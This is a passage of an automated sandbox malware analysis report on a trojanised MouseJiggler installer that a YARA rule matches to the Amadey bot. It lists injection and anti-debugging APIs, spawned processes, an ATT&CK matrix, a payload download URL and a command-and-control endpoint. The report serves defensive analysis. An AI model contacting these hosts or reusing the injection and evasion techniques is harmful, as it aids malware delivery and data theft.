          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,14_2_0040E0D4
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: 14_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,14_2_006B8DE4
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013CBE40 Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,GetUserNameW,GetComputerNameExW,19_2_013CBE40
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013D1541 mov eax, dword ptr fs:[00000030h]19_2_013D1541
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013D4CD2 mov eax, dword ptr fs:[00000030h]19_2_013D4CD2
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013D3828 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_013D3828
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013C1DA0 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,19_2_013C1DA0
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013CFB33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_013CFB33
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013D3828 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_013D3828

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Contains functionality to inject code into remote processesShow sources
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013C2250 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,19_2_013C2250
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeProcess created: C:\Program Files (x86)\MouseJiggler\libupdate.exe C:\Program Files (x86)\MouseJiggler\libupdate.exeJump to behavior
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\deldll.bat' 'Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpProcess created: C:\Program Files (x86)\MouseJiggler\libupdate.exe 'C:\Program Files (x86)\MouseJiggler\libupdate.exe' /VERYSILENTJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpProcess created: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe 'C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1 Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_006A60E8 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,11_2_006A60E8
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_005C7CE0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,11_2_005C7CE0
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_005C8B3C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,11_2_005C8B3C
          Source: sqconfig.exe, 00000013.00000002.545789142.0000000001C80000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: sqconfig.exe, 00000013.00000002.545789142.0000000001C80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: sqconfig.exe, 00000013.00000002.545789142.0000000001C80000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: sqconfig.exe, 00000013.00000002.545789142.0000000001C80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,9_2_0040B044
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: GetLocaleInfoW,9_2_0041E034
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: GetLocaleInfoW,9_2_0041E080
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: GetLocaleInfoW,9_2_004AF218
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_0040A4CC
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,11_2_0040E7F0
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: GetLocaleInfoW,11_2_006103F8
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0040DC78
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,12_2_0040B044
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: GetLocaleInfoW,12_2_0041E034
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: GetLocaleInfoW,12_2_0041E080
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: GetLocaleInfoW,12_2_004AF218
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_0040A4CC
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,14_2_0040E7F0
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: GetLocaleInfoW,14_2_006103F8
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_0040DC78
          Source: C:\Users\user\Desktop\Ac372JNTO6.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmpQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_00405AE0 cpuid 9_2_00405AE0
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_0041C3D8 GetLocalTime,9_2_0041C3D8
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013C1DA0 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,19_2_013C1DA0
          Source: C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmpCode function: 11_2_00625754 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,11_2_00625754
          Source: C:\Program Files (x86)\MouseJiggler\libupdate.exeCode function: 9_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,9_2_004B5114

          Stealing of Sensitive Information:

          barindex
          Yara detected Amadey botShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000013.00000002.546644069.0000000003A56000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: sqconfig.exe PID: 5836, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScripting1Startup Items1Startup Items1Deobfuscate/Decode Files or Information1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsNative API1DLL Side-Loading1Exploitation for Privilege Escalation1Scripting1LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter2Registry Run Keys / Startup Folder2DLL Side-Loading1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Access Token Manipulation1Software Packing3NTDSSystem Information Discovery35Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptProcess Injection113DLL Side-Loading1LSA SecretsSecurity Software Discovery121SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder2Masquerading2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection113/etc/passwd and /etc/shadowSystem Owner/User Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery11Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 494766 Sample: Ac372JNTO6.exe Startdate: 30/09/2021 Architecture: WINDOWS Score: 54 73 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->73 75 Multi AV Scanner detection for domain / URL 2->75 77 Found malware configuration 2->77 79 6 other signatures 2->79 10 Ac372JNTO6.exe 9 22 2->10         started        14 sqconfig.exe 2->14         started        process3 dnsIp4 71 a.pomf.cat 69.39.225.3, 443, 49756 ASN-GIGENETUS United States 10->71 55 C:\Program Files (x86)\...\libupdate.exe, PE32 10->55 dropped 57 C:\Users\user\AppData\Local\...\genteert.dll, PE32 10->57 dropped 59 C:\Users\user\AppData\Local\...\ssleay32.dll, PE32 10->59 dropped 61 4 other files (none is malicious) 10->61 dropped 16 libupdate.exe 2 10->16         started        19 cmd.exe 1 10->19         started        file5 process6 file7 41 C:\Users\user\AppData\Local\...\libupdate.tmp, PE32 16->41 dropped 22 libupdate.tmp 3 13 16->22         started        81 Uses ping.exe to sleep 19->81 83 Uses ping.exe to check the status of other devices and networks 19->83 25 PING.EXE 1 19->25         started        28 conhost.exe 19->28         started        30 PING.EXE 1 19->30         started        signatures8 process9 dnsIp10 53 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 22->53 dropped 32 libupdate.exe 2 22->32         started        69 127.0.0.1 unknown unknown 25->69 file11 process12 file13 43 C:\Users\user\AppData\Local\...\libupdate.tmp, PE32 32->43 dropped 35 libupdate.tmp 5 127 32->35         started        process14 file15 45 C:\Users\user\AppData\...\sqconfig.exe (copy), PE32 35->45 dropped 47 C:\Users\user\AppData\...\libplist.dll (copy), PE32 35->47 dropped 49 C:\Users\...\liborc-test-0.4-0.dll (copy), PE32 35->49 dropped 51 44 other files (none is malicious) 35->51 dropped 38 sqconfig.exe 16 35->38         started        process16 dnsIp17 63 91.241.19.101, 49761, 49762, 49763 REDBYTES-ASRU Russian Federation 38->63 65 192.168.2.3, 443, 49559, 49572 unknown unknown 38->65 67 192.168.2.1 unknown unknown 38->67

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Ac372JNTO6.exe21%VirustotalBrowse
          Ac372JNTO6.exe9%MetadefenderBrowse
          Ac372JNTO6.exe19%ReversingLabsByteCode-MSIL.Trojan.Omaneat

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\MouseJiggler\MouseJiggler.exe0%MetadefenderBrowse
          C:\Program Files (x86)\MouseJiggler\MouseJiggler.exe0%ReversingLabs
          C:\Program Files (x86)\MouseJiggler\libupdate.exe9%MetadefenderBrowse
          C:\Program Files (x86)\MouseJiggler\libupdate.exe31%ReversingLabsWin32.Trojan.Generic
          C:\Program Files (x86)\MouseJiggler\uninstall.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\genteeDA\guig.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\genteeDA\guig.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\genteeDA\libeay32.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\genteeDA\libeay32.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\genteeDA\ssleay32.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\genteeDA\ssleay32.dll0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          a.pomf.cat8%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://html4/loose.dtd0%Avira URL Cloudsafe
          https://a.pomf.cat/llbjiv.exe#setuppath#libupdate.exe00%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19A0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php?scr=10%Avira URL Cloudsafe
          http://.css0%Avira URL Cloudsafe
          https://fontawesome.comhttps://fontawesome.comFont0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.phpibuted0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfk0%Avira URL Cloudsafe
          https://www.remobjects.com/ps0%URL Reputationsafe
          http://subca.ocsp-certum.com010%URL Reputationsafe
          https://www.innosetup.com/0%URL Reputationsafe
          http://91.241.19.101/g7vcSfkbDs2/index.phptributed0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php?scr=190%Avira URL Cloudsafe
          https://www.tupitube.com0%Avira URL Cloudsafe
          http://.jpg0%Avira URL Cloudsafe
          https://a.pomf.cat/llbjiv.exe0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php?scr=1970%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19y0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php?0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.phpll32.dll0%Avira URL Cloudsafe
          http://ocsp.thawte.com00%URL Reputationsafe
          https://mousejiggler.orgLanglistEnglish0%Avira URL Cloudsafe
          http://cscasha2.ocsp-certum.com040%URL Reputationsafe
          http://www.gentee.comB0%Avira URL Cloudsafe
          https://mousejiggler.org0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php(0%Avira URL Cloudsafe
          91.241.19.101/g7vcSfkbDs2/index.php0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php?scr=1SfkbDs2/index.php0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php2190%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.phpistributed0%Avira URL Cloudsafe
          http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19s0%Avira URL Cloudsafe
          https://a.pomf.cat/llbjiv.exe.0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          a.pomf.cat
          		69.39.225.3
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://91.241.19.101/g7vcSfkbDs2/index.php?scr=1true
          • Avira URL Cloud: safe
          		unknown
          https://a.pomf.cat/llbjiv.exetrue
          • Avira URL Cloud: safe
          		unknown
          91.241.19.101/g7vcSfkbDs2/index.phptrue
          • Avira URL Cloud: safe
          		low
          http://91.241.19.101/g7vcSfkbDs2/index.phptrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://html4/loose.dtdlibupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmpfalse
          • Avira URL Cloud: safe
          		low
          https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUlibupdate.exe, 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, libupdate.exe, 0000000C.00000000.314861540.0000000000401000.00000020.00020000.sdmpfalse
            		high
            http://repository.certum.pl/cscasha2.cer0Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
              		high
              https://a.pomf.cat/llbjiv.exe#setuppath#libupdate.exe0Ac372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19Asqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.inkscape.org/)libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-JU5SL.tmp.14.drfalse
                		high
                http://.csslibupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://creativecommons.org/publicdomain/zero/1.0/libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                  		high
                  https://fontawesome.comhttps://fontawesome.comFontlibupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://jrsoftware.org/ishelp/index.php?topic=setupcmdlinelibupdate.exefalse
                    		high
                    http://91.241.19.101/g7vcSfkbDs2/index.phpibutedsqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.openssl.org/support/faq.htmlAc372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmpfalse
                      		high
                      https://fontawesome.comlibupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                        		high
                        https://openclipart.org/detail/188214/eraser-by-crisg-188214U2libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                          		high
                          https://opensource.org/licenses/MIT)libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                            		high
                            https://creativecommons.org/licenses/by/4.0/)libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                              		high
                              http://crl.thawte.com/ThawteTimestampingCA.crl0Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                		high
                                http://91.241.19.101/g7vcSfksqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.remobjects.com/pslibupdate.tmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://subca.ocsp-certum.com01Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.innosetup.com/libupdate.tmp, libupdate.tmp, 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://91.241.19.101/g7vcSfkbDs2/index.phptributedsqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sqlite.org/copyright.htmldBlibupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000002.401251302.0000000001C20000.00000002.00020000.sdmpfalse
                                  		high
                                  http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.tupitube.comis-Q8TJ0.tmp.14.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.openssl.org/fAc372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                    		high
                                    http://.jpglibupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.certum.pl/CPS0Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                      		high
                                      http://91.241.19.101/g7vcSfkbDs2/index.php?scr=197sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19ysqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://repository.certum.pl/ctnca.cer09Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                        		high
                                        http://91.241.19.101/g7vcSfkbDs2/index.php?sqconfig.exe, 00000013.00000002.546095216.0000000003650000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://91.241.19.101/g7vcSfkbDs2/index.phpll32.dllsqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://crl.certum.pl/ctnca.crl0kAc372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                          		high
                                          https://github.com/twbs/bootstrap/blob/main/LICENSE)libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                                            		high
                                            https://notepad-plus-plus.org/0Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmpfalse
                                              		high
                                              http://ocsp.thawte.com0Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://scripts.sil.org/OFL)libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                                                		high
                                                https://www.ekransystem.comis-TILI0.tmp.14.drfalse
                                                  		high
                                                  https://www.certum.pl/CPS0Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drfalse
                                                    		high
                                                    https://getbootstrap.com/)libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://mousejiggler.orgLanglistEnglishAc372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
